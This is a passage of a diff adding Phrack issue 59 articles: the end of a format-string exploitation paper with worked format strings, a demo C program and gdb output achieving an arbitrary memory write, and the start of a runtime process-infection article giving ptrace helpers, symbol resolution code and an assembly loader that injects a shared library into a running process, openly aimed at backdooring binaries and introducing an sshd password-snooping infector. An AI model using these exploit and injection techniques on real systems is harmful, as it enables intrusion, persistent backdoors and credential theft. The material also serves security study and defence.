+            ...        |         ...   
+         [  l7   ]     |      [  l7   ]
+         [  i0   ]     |      [  i0   ]
+         [  i1   ]     |      [  i1   ]
+            ...        |         ...   
+         [  i5   ]     |      [  i5   ]
+         [  fp   ] ----+      [  fp   ]
+         [  i7   ]     |      [  i7   ]
+         [ temp 1] ----+      [ temp 1]
+                              [ temp 2]
+
+
+--[ 7.3. example 3
+
+  In the case that we only have 1 pointer, we can get the same result by
+using the 'direct parameter access' in the format string, with
+%argument_number$, where 'argument_number' is a number between 0 and 30
+(in Solaris).
+
+  My format string should be the following:
+    '%4640d' +  # change the length
+    '%15$n'  +  # I write where argument 15 is pointing (arg 15 is fp!)
+    '%3530d' +  # change the length again
+    '%15$hn'    # write again, but only the hi part!
+
+  Therefore, we would arrive at the same result:
+
+          frame 0              frame 1 
+         [  l0   ]     +----> [ 0x20001234 ]
+         [  l1   ]     |      [  l1   ]
+            ...        |         ...   
+         [  l7   ]     |      [  l7   ]
+         [  i0   ]     |      [  i0   ]
+         [  i1   ]     |      [  i1   ]
+            ...        |         ...   
+         [  i5   ]     |      [  i5   ]
+         [  fp   ] ----+      [  fp   ]
+         [  i7   ]            [  i7   ]
+         [ temp 1]            [ temp 1]
+                              [ temp 2]
+
+--[ 7.4. example 4
+
+  But it could well happen that I don't have 2 pointers that point to the
+same address in the stack, and the first address that points to the stack
+is outside the scope of the first 30 arguments. What could I then do ?
+
+  Remember that with plain '%n', you can write very large numbers, like
+0x00028000 and higher. You should also keep in mind that the binary's PLT
+is usually located in very low addresses, like 0x0002????. So, with just
+one pointer that points to the stack, you can get a pointer that points to
+the binary's PLT.
+
+  I don't believe a graphic is necessary in this example.
+
+
+--[ 8. builind the 4-bytes-write-anything-anywhere primitive
+
+--[ 8.1. example 5
+
+  In order to get a 4-bytes-write-anything-anywhere primitive we should
+repeat what was done with the stack frame 0, and do it again for another
+stack frame, like frame 1. Our result should look something like the
+following:
+
+      frame 0              frame 1               frame 2
+     [  l0   ]     +----> [0x00029e8c]   +----> [0x00029e8e]
+     [  l1   ]     |      [  l1   ]      |      [  l1   ]
+        ...        |         ...         |         ...   
+     [  l7   ]     |      [  l7   ]      |      [  l7   ]
+     [  i0   ]     |      [  i0   ]      |      [  i0   ]
+     [  i1   ]     |      [  i1   ]      |      [  i1   ]
+        ...        |         ...         |         ...   
+     [  i5   ]     |      [  i5   ]      |      [  i5   ]
+     [  fp   ] ----+      [  fp   ]  ----+      [  fp   ]
+     [  i7   ]            [  i7   ]      |      [  i7   ]
+     [ temp 1]            [ temp 1]      |
+                          [ temp 2]  ----+
+                          [ temp 3]
+
+  [Note: As long as the code we want to change is located in 0x00029e8c ]
+
+  So, now that we have 2 pointers, one that points to 0x00029e8c and
+another that points to 0x00029e8e, we have finally achieved our goal! Now,
+we can exploit this situation just like any other format string
+vulnerability :)
+
+  The format string will look like this:
+
+    '%4640d' +  # change the length
+    '%15$n'  +  # with 'direct parameter access' I write the lower part
+                # of frame 1's l0
+    '%3530d' +  # change the length again
+    '%15$hn' +  # overwrite the higher part
+    '%9876d' +  # change the length
+    '%18$hn' +  # And write like any format string exploit!
+
+
+    '%8x' * 13+ # pop 13 arguments (from argument 15)
+    '%6789d' +  # change length
+    '%n'     +  # write lower part
+    '%8x'    +  # pop
+    '%1122d' +  # modify length
+    '%hn'    +  # write higher part
+    '%2211d' +  # modify length
+    '%hn'       # And write, again, like any format string exploit.
+
+
+  As you can see, this was done with just one format string. But this is
+not always possible. If we can't build 2 pointers, what we need to do, is
+to abuse the format string twice.
+
+  First, we build a pointer that points to 0x00029e8c. Then, we overwrite
+the value that 0x00029e8c points to with '%hn'.
+ 
+  The second time in which we abuse of the format string, we do the same as
+we did before, but with a pointer to 0x00029e8e. There is no real need for
+two pointers (0x00029e8c and 0x00029e8e), as writing first the lower part
+with %n and then the higher part with %hn will work, but you'll have to use
+the same pointer twice, only possible with direct parameter access.
+
+--[ 9. the i386 stack 
+
+  We can also, exploit a heap based format strings in the i386 arquitecture
+using a very similar technique. Lets see how the i386 stack works.
+
+        frame 0        frame 1        frame 2        frame 3
+       [  ebp  ] ---> [  ebp  ] ---> [  ebp  ] ---> [  ebp  ]
+       [       ]      [       ]      [       ]      [       ]
+       [       ]      [       ]      [       ]      [       ]
+       [ ...   ]      [ ...   ]      [ ...   ]      [ ...   ]
+
+  As you can see, i386's stack is very similar to SPARC's, the main
+difference is that all the addresses are stored in little-endian format.
+
+         frame0           frame1
+        [ LSB | MSB ] ---> [ LSB | MSB ] 
+        [           ]      [           ] 
+
+  So, the trick we were using in SPARC of overwriting address's LSB
+with '%n', and then overwriting its MSB with '%hn' with just one pointer
+won't work in this architecture.
+
+  We need an additional pointer, pointing to MSB's address, in order to
+change it. Something like this:
+
+                    +----------------------------+
+                    |                            |
+                    |                            V
+       [LSB | MSB]  |   [LSB | MSB] ---> [LSB | MSB]
+       [         ]  |   [         ]      [         ]
+       [         ] -+   [         ]      [         ]
+       [  ...    ]      [   ...   ]      [   ...   ]
+         Frame B          Frame C          Frame D
+
+  Heh! as you probably guessed, this is not very common on everyday stacks,
+so, what we are going to do, is build the pointers we need, and then, of
+course, use them.
+
+  Warning! We just found out that this technique does not work on latest
+Linuxes, we are not even sure if works on any (it depends on libc/glibc
+version), but we know it works, at least, on OpenBSD, FreeBSD and Solaris
+x86). 
+
+--[ 9.1. example 6
+
+  This trick will need an aditional frame... latter we'll try to get rid
+of as many frames as possible.
+  
+                                 +----------------------------+
+                                 |                            |
+                                 |                            V
+   [LSB | MSB] ---> [LSB | MSB] -+   [LSB | MSB] ---> [LSB | MSB]
+   [         ]      [         ]      [         ]      [         ]
+   [         ]      [         ]      [         ]      [         ]
+   [  ...    ]      [  ...    ]      [   ...   ]      [   ...   ]
+     Frame A          Frame B          Frame C          Frame D
+
+  Frame A has a pointer to Frame B. Specifically, it's pointing to Frame
+B's ebp. So we can modify the LSB of Frame B's ebp, with an '%hn'. And that
+is what we wanted!. Now Frame B is not pointing to Frame C, but to the MSB
+of Frame D's ebp.
+
+  We are abusing the fact that ebp is already pointing to the stack, and we
+assume that changing its 2 LSB will be enough to make it point to another
+frame's saved ebp. There may be some problems with this (if Frame D is
+not on the same 64k "segment" of Frame C), but we'll get rid of this
+problem in the following examples.
+
+  So with 4 stack frames, we could build one pointer in the stack, and with
+that pointer we could write 2 bytes anywhere in memory. If we have 8 stack
+frames we could repeat the process and build 2 pointers in the stack,
+allowing us to write 4 bytes anywhere in memory.
+
+--[ 9.2. example 7 - the pointer generator
+
+  There are cases where you don't have 8 (or 4) stack frames. What can we
+do then? Well, using direct parameter access, we could use just 3 stack
+frames to do everything, and not only a 4-bytes-write-anything-anywhere
+primitive but almost a full write-anything-anywhere primitive.
+
+Lets see how we can do it, heavily abusing direct parameter access,
+our target? to build the address 0xdfbfddf0 in the stack, so we can use it
+latter with another %hn to write there.
+
+step 1:
+
+  Frame B's saved frame pointer (saved ebp) is already pointing to Frame
+C's saved ebp, so, the first thing we are going to do is change Frame's C
+LSB:
+
+         [ LSB | MSB ] ---> [ LSB | MSB ] ---> [ LSB | MSB ]
+         [           ]      [           ]      [           ]
+         [           ]      [           ]      [           ]
+         [   ...     ]      [    ...    ]      [    ...    ]
+            Frame A            Frame B            Frame C
+  
+  Since we know where in the stack is Frame B, we could use direct
+parameter access to access parameters out of order... and probably not
+just once. Latter we'll see how to find the direct parameter access number
+we need, right now lets just assume Frame B's is 14.
+
+                 # step 1
+    '%.56816u' + # change the length (we want to write 0xddf0)
+    '%14$hn'   + # Write where argument 14 is pointing
+                 # (arg 14 is Frame B's ebp)
+
+  What we get is a modified Frame C's ebp.
+
+step 2:
+         [ LSB | MSB ] ---> [ LSB | MSB ] ---> [ ddf0| MSB ]
+         [           ]      [           ]      [           ]
+         [           ]      [           ]      [           ]
+         [   ...     ]      [    ...    ]      [    ...    ]
+            Frame A            Frame B            Frame C
+
+  As Frame A's ebp is already pointing to Frame B's ebp, we can use it to
+change the LSB of Frame B's ebp, and as it is already pointing to Frame C's
+ebp's LSB we can make it point to Frame C's ebp's MSB, we won't have the
+64k segments problem this time, as Frame C's ebp's LSB must be in the same
+segment as its MSB, as it's always 4 bytes aligned... I know it's
+confusing...
+  For example if Frame C is at 0xdfbfdd6c, we will want to make Frame B's
+ebp to point to 0xdfbfdd6e, so we can write target address' MSB.
+
+                # step 2
+    '%.65406u'+ # we want to write 0xdd6e (65406 = 0x1dd6e-0xddf0)
+    '%6$hn'   + # Write where argument 6 is pointing
+                # (assuming arg 6 is Frame A's ebp)
+
+step 3:
+                                            +----------+
+                                            |          V
+         [ LSB | MSB ] ---> [ dd6e| MSB ] --+  [ ddf0| MSB ]
+         [           ]      [           ]      [           ]
+         [           ]      [           ]      [           ]
+         [   ...     ]      [    ...    ]      [    ...    ]
+            Frame A            Frame B            Frame C
+
+
+  The new Frame B points to the MSB of the Frame C's ebp. And now, with 
+another direct parameter access, we build the MSB of the address that we
+were looking for.
+
+                # step 3
+    '%.593u'  + # we want to write 0xdfbf (593 = 0xdfbf - 0xdd6e)
+    '%14$n'   + # Write where argument 14 is pointing
+                # (arg 14 is Frame B's ebp)
+
+
+our result:
+                                            +----------+
+                                            |          V
+         [ LSB | MSB ] ---> [ dd6e| MSB ] --+  [ ddf0| dfbf]
+         [           ]      [           ]      [           ]
+         [           ]      [           ]      [           ]
+         [   ...     ]      [    ...    ]      [    ...    ]
+            Frame A            Frame B            Frame C
+
+
+  As you can see, we have our pointer in Frame C's ebp, now we could use it
+to write 2 bytes anywhere in memory. This won't be enough normally to make
+an exploit, but we could use the same trick, USING THESE 3 STACK FRAMES
+AGAIN, to build another pointer (and another, and another...)
+Hey, we've found a pointer generator :-) with only 3 stack frames.
+
+  Got the theory? let's put all this together in an example.
+
+  The following code will use 3 frames (A,B,C) and multiple parameters
+access to write the value 0xaabbccdd to the address 0xdfbfddf0. It was
+tested on an OpenBSD 3.0, and can be tried on other systems.  We'll show
+you here how to tune it to your box.
+
+  /* fs2.c                                                   *
+   * demo program to show format strings techinques          *
+   * specially crafted to feed your brain by gera@corest.com */
+
+  do_printf(char *msg) {
+    printf(msg);
+  }
+  
+  #define FrameC 0xdfbfdd6c
+  #define counter(x)      ((a=(x)-b),(a+=(a<0?0x10000:0)),(b=(x)),a) 
+  
+  char *write_two_bytes(
+      unsigned long where, 
+      unsigned short what, 
+      int restoreFrameB)
+  {
+    static char buf[1000]={0};    // enough? sure! :)
+    static int a,b=0;
+  
+    if (restoreFrameB)
+      sprintf(buf, "%s%%.%du%%6$hn" , buf, counter((FrameC & 0xffff)));
+    sprintf(buf, "%s%%.%du%%14$hn", buf, counter(where & 0xffff));
+    sprintf(buf, "%s%%.%du%%6$hn" , buf, counter((FrameC & 0xffff) + 2));
+    sprintf(buf, "%s%%.%du%%14$hn", buf, counter(where >> 0x10));
+    sprintf(buf, "%s%%.%du%%29$hn", buf, counter(what));
+    return buf;
+  }
+  
+  int main() {
+    char *buf;
+    buf = write_two_bytes(0xdfbfddf0,0xccdd,0);
+    buf = write_two_bytes(0xdfbfddf2,0xaabb,1);
+    do_printf(buf);
+  }
+
+  The values you'll need to change are:
+
+    %6$         number of parameter for Frame A's ebp
+    %14$        number of parameter for Frame B's ebp
+    %29$        number of parameter for Frame C's ebp
+    0xdfbfdd6c  address of Frame C's ebp
+
+  To get the right values:
+
+gera@vaiolent> cc -o fs fs.c
+gera@vaiolent> gdb fs
+(gdb) br do_printf
+(gdb) r
+(gdb) disp/i $pc
+(gdb) ni
+(gdb) p "run until you get to the first call in do_printf"
+(gdb) ni
+1: x/i $eip  0x17a4 <do_printf+12>:     call   0x208c <_DYNAMIC+140>
+(gdb) bt
+#0  0x17a4 in do_printf ()
+#1  0x1968 in main ()
+(gdb) x/40x $sp
+0xdfbfdcf8:     0x000020d4      0xdfbfdd70      0xdfbfdd00      0x0000195f
+0xdfbfdd08:     0xdfbfddf2      0x0000aabb     [0xdfbfdd30]--+ (0x00001968)
+0xdfbfdd18:     0x000020d4      0x0000ccdd      0x00000000   |  0x00001937
+0xdfbfdd28:     0x00000000      0x00000000   +-[0xdfbfdd6c]<-+  0x0000109c
+0xdfbfdd38:     0x00000001      0xdfbfdd74   |  0xdfbfdd7c      0x00002000
+0xdfbfdd48:     0x0000002f      0x00000000   |  0x00000000      0xdfbfdff0
+0xdfbfdd58:     0x00000000      0x0005a0c8   |  0x00000000      0x00000000
+0xdfbfdd68:     0x00002000     [0x00000000]<-+  0x00000001      0xdfbfddd4
+0xdfbfdd78:     0x00000000      0xdfbfddeb      0xdfbfde04      0xdfbfde0f
+0xdfbfdd88:     0xdfbfde50      0xdfbfde66      0xdfbfde7e      0xdfbfde9e
+
+  Ok, time to start getting the right values. First, 0x1968 (from previous
+'bt' command) is where do_printf() will return after finishing, locate it
+in the stack (in this example it's at 0xdfbfdd14). The previous word is
+where Frame A starts, and is where Frame A's ebp is saved, here it's
+0xdfbfdd30.
+  Great! now we need the direct parameter access number for it, so, as we
+executed up to the call, the first word in the stack is the first argument
+for printf(), numbered 0. If you count, starting from 0, up to Frame A's
+ebp, you'll count 6 words, that's the number we want.
+  Now, locate where Frame A's ebp is pointing to, that's Frame B's ebp,
+here 0xdfbfdd6c. Count again, you'll get 14, 2nd value needed. Cool, now
+Frame B's saved ebp is ponting to Frame C's ebp, so, we already have
+another value: 0xdfbfdd6c. And to get the last number needed, you need to
+count again, until you get to Frame C's ebp (count until you get to the
+address 0xdfbfdd6c), you should get 29.
+
+  Now edit your fs.c, compile it, gdb it, and run past the call (one more
+'ni'), you should see a lot of zeros and then:
+
+(gdb) x/x 0xdfbfddf0
+0xdfbfddf0:     0xaabbccdd
+
+  Apparently it does work after all :-)
+
+  There are some interesting variants. In this example, printf() is not
+called from main(), but from do_printf(). This is an artifact so we had 3
+frames to play with. If the printf() is directly in main(), you will not
+have three frames, but you could do just the same using argv and *argv, as
+the only real things you need are a pointer in the stack, pointing to
+another pointer in the stack pointing somewhere in the stack.
+
+  Another interesting method (probably even more interesting than the
+original), is to target not a function pointer but a return address in
+stack.  This method will be a lot shorter (just 2 %hn per short to write,
+and only 2 frames needed), a lot of addresses could be bruteforced at the
+same time, and of course, you could use a jumpcode if you want.
+
+  This time We'll leave the experimentation with this two variantes (and
+others) to the reader.
+
+  It is noteworthy, that with this technique in i386, Frame B breaks the
+chain of the stack frames, so if the program you're exploiting needs to use
+Frame C, it's probably that it will segfault, hence you'll need to hook the
+execution flow before the crash.
+
+--[ 10. conclusions
+
+--[ 10.1. is it dangerous to overwrite the l0 (on the stack frame) ?
+
+  This is not perfect, but practice shows that you will not have many
+problems in changing the value of l0. But, would you be unlucky, you may
+prefer to modify the l0's that belongs to main()'s and _start()'s stack
+frames.
+
+--[ 10.2. is it dangerous to overwrite the ebp (on the stack frame) ?
+
+  Yes, it's very dangerous. Probably your program will crash. But as we
+saw, you can restore the original ebp value using the pointer generator :-)
+And as in the SPARC case, you may prefer to modify the ebp's that belongs
+to the main(), _start(), etc, stack frames.
+
+
+--[ 10.3. is this reliable ?
+
+  If you know the state of the stack, or if you know the sizes of the stack
+frames, it is reliable. Otherwise, unless the situation lets you implement
+some smooth way of bruteforcing all the numbers needed, this technique
+won't help you much.
+
+  I think when you have to overwrite values that are located in addresses
+that have zeros, this may be your only hope, since, you won't be able to
+put a zero in your format string (because it will truncate your string).
+
+  Also in SPARC, the binaries' PLT are located in low addresses and it is
+more reliable to overwrite the binary's PLT than the libc's PLT. Why is
+this so? Because, I would guess, in Solaris libc changes more frequently
+than the binary that you want to exploit. And probably, the binary you want
+to exploit will never change! 
+
+--[ The End
+--[ 11. more greets and thanks
+
+  gera:
+
+    riq, for trying every stupid idea I have and making it real!
+
+    juliano, for being our format strings guru.
+
+    Impact, for forcing me to spend time thinking about all theese amazing
+    things.
+
+    last minute addition: I just learned of the existence of a library
+    called fmtgen, Copyrighted by fish stiqz. It's a format string
+    construction library, and it can be used (as suggested in its Readme),
+    to write jumpcodes or even shellcodes as well as addresses. This are
+    the last lines I'm adding to the article, I wish I had a little more
+    time, to study it, but we are in a hurry, you know :-)
+  riq:
+
+    gera, for finding out how to exploit the heap based format strings in
+    i386, for his ideas, suggestions and fixes.
+
+    juliano, for letting me know that I can overwrite, as may times as I
+    want an address using 'direct access', and other tips about format
+    strings.
+
+    javier, for helping me in SPARC.
+
+    bombi, for trying her best to correct my English.
+
+    and bruce, for correcting my English, too.
+
+--[ 12. references
+
+[1] Exploiting Format String Vulnerability, scut's. 
+    March 2001. http://www.team-teso.net/articles/formatstring
+
+[2] w00w00 on Heap Overflows, Matt Conover (shok) and w00w00 Security Team.
+    January 1999. http://www.w00w00.org/articles.html
+
+[3] Juliano's badc0ded
+    http://community.corest.com/~juliano
+
+[4] Google the oracle.
+    http://www.google.com
+
+|=[ EOF ]=---------------------------------------------------------------=|
diff --git a/phrack59/8.txt b/phrack59/8.txt
new file mode 100644
index 0000000..ebb65a0
--- /dev/null
+++ b/phrack59/8.txt
@@ -0,0 +1,1029 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3b, Phile #0x08 of 0x12
+
+|=--------------------=[ Runtime Process Infection ]=--------------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[ anonymous <p59_08@author.phrack.org> ]=--------------=|
+
+--[ Contents
+
+  1 - Introduction
+  2 - ptrace() - Linux debugging API
+  3 - resolving symbols
+  4 - plain asm code injection - old fashioned way
+  5 - .so injection - easy way
+  6 - A brief note about shared lib redirection
+  7 - Conclusion
+
+  8 - References
+
+  A - Appendix - sshfucker: runtime sshd infector
+
+
+--[ 1 - Introduction
+
+The purpose of this article is to introduce a couple of methods for
+infecting binaries on runtime, and even though there are many other
+possible areas of use for this technique, we will mainly focus on a bit
+more evil things, such as backdooring binaries. However, this is not
+supposed to be ELF tutorial nor guide to linking. The reader is assumed to
+be somewhat familiar with ELF. Also, this article is strictly x86 linux
+specified, even though the same techniques and methods could be easily
+ported to other platforms as well.
+
+
+--[ 2 - ptrace() - Linux debugging API
+
+Linux offers one simple function for playing with processes, and it can do
+pretty much everything we need to do. We will not take a more indepth look
+at ptrace() here, since its quite simple and pretty much all we need to
+know can be found on the man page. However we will introduce a couple of
+helper functions to make working with ptrace() easier.
+
+
+/* attach to pid */
+
+	void
+	ptrace_attach(int pid)
+	{
+		if((ptrace(PTRACE_ATTACH , pid , NULL , NULL)) < 0) {
+			perror("ptrace_attach");
+			exit(-1);
+		}
+
+		waitpid(pid , NULL , WUNTRACED);
+	}
+
+
+/* continue execution */
+
+	void
+	ptrace_cont(int pid)
+	{
+		if((ptrace(PTRACE_CONT , pid , NULL , NULL)) < 0) {
+			perror("ptrace_cont");
+			exit(-1);
+		}
+
+		while (!WIFSTOPPED(s)) waitpid(pid , &s , WNOHANG);
+	}
+
+
+/* detach process */
+
+	void
+	ptrace_detach(int pid)
+	{
+		if(ptrace(PTRACE_DETACH, pid , NULL , NULL) < 0) {
+			perror("ptrace_detach");
+			exit(-1);
+		}
+	}
+
+/* read data from location addr */
+
+	void *
+	read_data(int pid ,unsigned long addr ,void *vptr ,int len)
+	{
+		int i , count;
+		long word;
+		unsigned long *ptr = (unsigned long *) vptr;
+
+		count = i = 0;
+		
+		while (count < len) {
+			word = ptrace(PTRACE_PEEKTEXT ,pid ,addr+count, \
+NULL);
+			count += 4;
+			ptr[i++] = word;
+		}
+	}
+
+
+/* write data to location addr */	
+
+	void
+	write_data(int pid ,unsigned long addr ,void *vptr,int len)
+	{
+        	int i , count;
+        	long word;
+
+		i = count = 0;
+
+		while (count < len) {
+			memcpy(&word , vptr+count , sizeof(word));
+			word = ptrace(PTRACE_POKETEXT, pid , \
+				addr+count , word);
+			count +=4;
+		}
+	}
+
+
+--[ 3 - resolving symbols
+
+As long as we are planning any kind of function intercepting/modifying, we
+need ways to locate some certain functions in the binary. For now we are
+gonna use link-map for that. link_map is dynamic linkers internal structure
+with which it keeps track of loaded libraries and symbols within libraries.
+Basicly link-map is a linked list, each item on list having a pointer to
+loaded library. Just like dynamic linker does when it needs to find symbol,
+we can travel this list back and forth, go through each library on the list
+to find our symbol. the link-map can be found on the second entry of GOT
+(global offset table) of each object file. It is no problem for us to read
+link-map node address from the GOT[1] and start following linkmap nodes
+until the symbol we wanted has been found.
+
+from link.h:
+
+	struct link_map
+	{
+	    ElfW(Addr) l_addr;  /* Base address shared object is loaded */
+	    char *l_name;  /* Absolute file name object was found in.  */
+	    ElfW(Dyn) *l_ld;  /* Dynamic section of the shared object.  */
+	    struct link_map *l_next, *l_prev; /* Chain of loaded objects.*/
+	};
+
+
+The structure is quite self-explaining, but here is a short explanation of
+all items anyway:
+
+l_addr: Base address where shared object is loaded. This value can also be
+	found from /proc/<pid>/maps
+
+l_name: pointer to library name in string table
+
+l_ld: pointer to dynamic (DT_*) sections of shared lib
+
+l_next: pointer to next link_map node
+
+l_prev: pointer to previous link_map node
+
+
+The idea for symbol resolving with the link_map struct is simple. We
+traverse throu link_map list, comparing each l_name item until the library
+where our symbol is supposed to reside is found. Then we move to l_ld
+struct and traverse throu dynamic sections until DT_SYMTAB and DT_STRTAB
+have been found, and finally we can seek our symbol from DT_SYMTAB. This
+can be quite slow, but should be fine for our example. Using HASH table for
+symbol lookup would be faster and preferred, but that is left as exercise
+for the reader ;D.
+
+Let's look at some of the functions making life more easy with the
+link_map. The below code is based on grugq's code on  his ml post[1], altered
+to use ptrace() for resolving in another process address space:
+
+
+/* locate link-map in pid's memory */
+
+struct link_map *
+locate_linkmap(int pid)
+{
+	Elf32_Ehdr      *ehdr   = malloc(sizeof(Elf32_Ehdr));
+	Elf32_Phdr      *phdr   = malloc(sizeof(Elf32_Phdr));
+	Elf32_Dyn       *dyn    = malloc(sizeof(Elf32_Dyn));
+	Elf32_Word      got;
+	struct link_map *l      = malloc(sizeof(struct link_map));
+	unsigned long   phdr_addr , dyn_addr , map_addr;
+
+
+	/* first we check from elf header, mapped at 0x08048000, the offset
+	 * to the program header table from where we try to locate
+	 * PT_DYNAMIC section.
+	 */
+
+	read_data(pid , 0x08048000 , ehdr , sizeof(Elf32_Ehdr));
+
+	phdr_addr = 0x08048000 + ehdr->e_phoff;
+	printf("program header at %p\n", phdr_addr);
+
+	read_data(pid , phdr_addr, phdr , sizeof(Elf32_Phdr));
+
+	while ( phdr->p_type != PT_DYNAMIC ) {
+		read_data(pid, phdr_addr += sizeof(Elf32_Phdr), phdr, \
+			sizeof(Elf32_Phdr));
+	}
+
+	/* now go through dynamic section until we find address of the GOT
+	 */
+
+	read_data(pid, phdr->p_vaddr, dyn, sizeof(Elf32_Dyn));
+	dyn_addr = phdr->p_vaddr;
+
+	while ( dyn->d_tag != DT_PLTGOT ) {
+		read_data(pid, dyn_addr += sizeof(Elf32_Dyn), dyn,\ 
+			sizeof(Elf32_Dyn));
+	}
+
+	got = (Elf32_Word) dyn->d_un.d_ptr;
+	got += 4; 		/* second GOT entry, remember? */
+
+	/* now just read first link_map item and return it */
+	read_data(pid, (unsigned long) got, &map_addr , 4);
+	read_data(pid , map_addr, l , sizeof(struct link_map));
+
+	free(phdr);
+	free(ehdr);
+	free(dyn);
+
+	return l;
+}
+
+/* search locations of DT_SYMTAB and DT_STRTAB and save them into global
+ * variables, also save the nchains from hash table.
+ */
+
+
+unsigned long   symtab;
+unsigned long   strtab;
+int             nchains;
+
+
+void
+resolv_tables(int pid , struct link_map *map)
+{
+	Elf32_Dyn       *dyn    = malloc(sizeof(Elf32_Dyn));
+	unsigned long   addr;
+
+	addr = (unsigned long) map->l_ld;
+
+	read_data(pid , addr, dyn, sizeof(Elf32_Dyn));
+
+	while ( dyn->d_tag ) {
+		switch ( dyn->d_tag ) {
+
+			case DT_HASH:
+				read_data(pid,dyn->d_un.d_ptr +\
+					map->l_addr+4,\
+					&nchains , sizeof(nchains));
+				break;
+
+			case DT_STRTAB:
+				strtab = dyn->d_un.d_ptr;
+				break;
+
+			case DT_SYMTAB:
+				symtab = dyn->d_un.d_ptr;
+				break;
+
+			default:
+				break;
+		}
+
+		addr += sizeof(Elf32_Dyn);
+		read_data(pid, addr , dyn , sizeof(Elf32_Dyn));
+	}
+
+	free(dyn);
+}
+
+/* find symbol in DT_SYMTAB */
+
+unsigned long
+find_sym_in_tables(int pid, struct link_map *map , char *sym_name)
+{
+	Elf32_Sym       *sym = malloc(sizeof(Elf32_Sym));
+	char            *str;
+	int             i;
+
+	i = 0;
+
+	while (i < nchains) {
+		read_data(pid, symtab+(i*sizeof(Elf32_Sym)), sym,
+			sizeof(Elf32_Sym));
+		i++;
+
+		if (ELF32_ST_TYPE(sym->st_info) != STT_FUNC) continue;
+
+		/* read symbol name from the string table */
+		str = read_str(pid, strtab + sym->st_name);
+
+		if(strncmp(str , sym_name , strlen(sym_name)) == 0)
+			return(map->l_addr+sym->st_value);
+	}
+
+	/* no symbol found, return 0 */
+	return 0;
+}
+
+We use nchains (number of items in chain array) stored from DT_HASH to
+check how many symbols each lib has so we know where to stop reading in
+case the wanted symbol is not found.
+
+
+--[ 4 - plain asm code injection - old fashioned way
+
+We are gonna skip this part because of lack of time and interest. Simple
+pure-asm code injectors have been around for quite sometime already, and
+techniq is probably already clear, since it just really is poking opcodes
+into process memory, overwriting old data, allocating space with sbrk() or
+finding space otherwhere for own code. However, there is another method
+with which you do not have to worry about finding space for your code
+(atleast when playing with dynamically linked binaries) and we are coming
+to it next.
+
+
+--[ 5 - .so injection - easy way
+
+Instead of injecting pure asm code we could force the process to load our
+shared library and let the runtime dynamic linker to do all dirty work for
+us. Benefits of this is the simplicity, we can write the whole .so with
+pure C and call external symbols. libdl offers a programming interface to
+dynamic linking loader, but a quick look to libdl sources show us that
+dlopen() , dlsym() and dlclose() are quite much just wrapper functions with
+some extra error checking, while the real functions are residing in libc.
+here's the prototype to _dl_open() from glibc-2.2.4/elf/dl-open.c:
+
+	void *
+	internal_function
+	_dl_open (const char *file, int mode, const void *caller);
+
+Parameters are pretty much the same as in dlopen(), having only one 'extra'
+parameter *caller, which is pointer to calling routine and its not really
+important to us and we can safely ignore it. We will not need other dl*
+functions now either.
+
+So, we know which function we can be used to load our shared library, and
+now we could write a small asm code snippet which calls _dl_open() and
+loads our lib and thats exactly what we are gonna do. One thing to remember
+is that _dl_open() is defined as an 'internal_function', which means the
+function parameters are passed in slightly different way, via registers
+instead of stack. See the parameters order here:
+
+	EAX = const char *file
+	ECX = const void *caller (we set it to NULL)
+	EDX = int mode (RTLD_LAZY)
+
+
+Asset with this information, we will introduce our tiny .so loader code:
+
+	_start:	jmp string
+
+	begin:	pop 	eax			; char *file
+		xor	ecx	,ecx		; *caller
+		mov 	edx	,0x1		; int mode
+
+		mov	ebx,	0x12345678	; addr of _dl_open()
+		call	ebx			; call _dl_open!
+		add	esp,	0x4
+
+		int3				; breakpoint
+
+
+	string: call begin
+		db "/tmp/ourlibby.so",0x00
+
+
+With good'old aleph1-style trick we make our loader position independent
+(well it actually does not have to be, since we can place it anywhere we
+want to). We also place int3 after 'call' so process stops execution there
+and we can overwrite our loader with backed up, orginal code again.
+_dl_open()  address is not known yet, but we can easily patch it into code
+afterwards.
+
+  A cleaner way would be getting the registers with ptrace(pid,
+PTRACE_GETREGS,...) and write the parameters to user_regs_struct structure,
+store libpath string in the stack and inject plain int 0x80 and int3, but
+it is really just a matter of taste and lazyness how you do this. About
+.so injection, this obviously will not work with staticly compiled binaries
+since static binaries do not even have dynamic linker loaded. For such
+binaries one has to think of something else, maybe plain-asm code injection
+or something. Another disadvantage of injecting shared objects is that it
+can be easily noticed by peeking into /proc/<pid>/maps. Though one can use
+lkm's / kmem patching to hide them, or maybe infecting existing already
+loaded libs with new symbols and then forcing to reload them. However, if
+anyone has good ideas how to solve these problems, I would like to hear
+about them.
+
+
+--[ 6 - A brief note about shared lib redirection
+
+For runtime infection, function redirection is prolly the most obvious
+thing to do. Like Silvio Cesare showed us on his paper [2], PLT (Procedure
+Linkage Table) is prolly the cleanest and easiest way to do this. Getting
+our hands on executable's PLT via the linkmap is easy, the very first node
+of the link_map list has pointers to executables dynamic sections, and from
+there we can look for DT_SYMTAB section (just as we do with all objects),
+executables DT_SYMTAB entries are in fact part of the PLT. Redirection is
+done by placing jumps into the corresponding function entries on the PLT,
+to our functions in .so what we loaded.
+
+
+--[ 7 - Conclusion
+
+Runtime infection is a quite interesting technique indeed. It does not only
+pass pax, openwall and other such kernel patches, but tripwire and other
+file integrity checkers as well. As a demonstration of runtime infection
+abilities I have included little sshd-infector at the end of this article.
+It is capable of snooping crypt(), PAM and md5 passwords of users logged
+via sshd. See Appendix A.
+
+
+--[ 8 - References
+   
+[1] More elf buggery, bugtraq post, by grugq 
+    http://online.securityfocus.com/archive/1/274283/2002-07-10/2002-07-16/2
+
+[2] Shared lib redirection by Silvio Cesare
+    http://www.big.net.au/~silvio/lib-redirection.txt
+
+    Subversive Dynamic Linking, by grugq
+    http://online.securityfocus.com/data/library/subversiveld.pdf
+
+    Shaun Clowes's Blackhat 2001 presentation slides
+    http://www.blackhat.com/presentations/bh-europe-01/shaun-clowes/injectso3.ppt
+
+    Tool Interface Standard (TIS) Executable and Linking Format Specification
+    http://x86.ddj.com/ftp/manuals/tools/elf.pdf
+
+    ptrace(2) man page
+    http://www.die.net/doc/linux/man/man2/ptrace.2.html
+
+
+--[ Appendix A - sshfucker: runtime sshd infector
+
+     sshf typescript:
+
+root@:/tmp> tar zxvf sshf.tgz
+sshf/
+sshf/sshf.c
+sshf/evilsshd.c
+sshf/Makefile.in
+sshf/config.h.in
+sshf/configure
+root@:/tmp> cd sshf
+root@:/tmp/sshf> ./configure ; make
+checking for gcc... gcc
+checking for C compiler default output... a.out
+checking whether the C compiler works... yes
+checking whether we are cross compiling... no
